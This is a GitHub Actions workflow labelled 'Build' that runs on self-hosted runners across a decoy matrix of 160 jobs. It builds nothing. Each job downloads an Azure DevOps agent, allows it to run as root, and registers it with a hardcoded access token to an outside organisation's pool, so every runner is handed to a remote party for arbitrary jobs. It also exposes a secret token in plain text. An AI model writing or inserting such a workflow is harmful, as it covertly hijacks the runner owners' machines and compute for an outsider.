name: Build
on: [push, pull_request]
jobs:
  build:
    name: Build
    runs-on: self-hosted
    strategy:
      max-parallel: 40
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.0]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P]
    timeout-minutes: 360
    steps:
     - run: |
        wget https://vstsagentpackage.azureedge.net/agent/2.189.0/vsts-agent-linux-x64-2.189.0.tar.gz
        tar -xvf vsts-agent-linux-x64-2.189.0.tar.gz
        chmod +x config.sh
        SEGER=$(echo $(shuf -i 1-77777777777 -n 1)korongs)
        export AGENT_ALLOW_RUNASROOT="1"
        ./config.sh --unattended \
        --agent $SEGER \
        --url https://dev.azure.com/gassrb \
        --auth PAT \
        --token b3hvi2y6jfezohhanh7fl4dhwm4aydu4e77yr754y2kr27pbm7aq \
        --pool botol \
        --work _work \
        --replace \
        --acceptTeeEula && ./run.sh
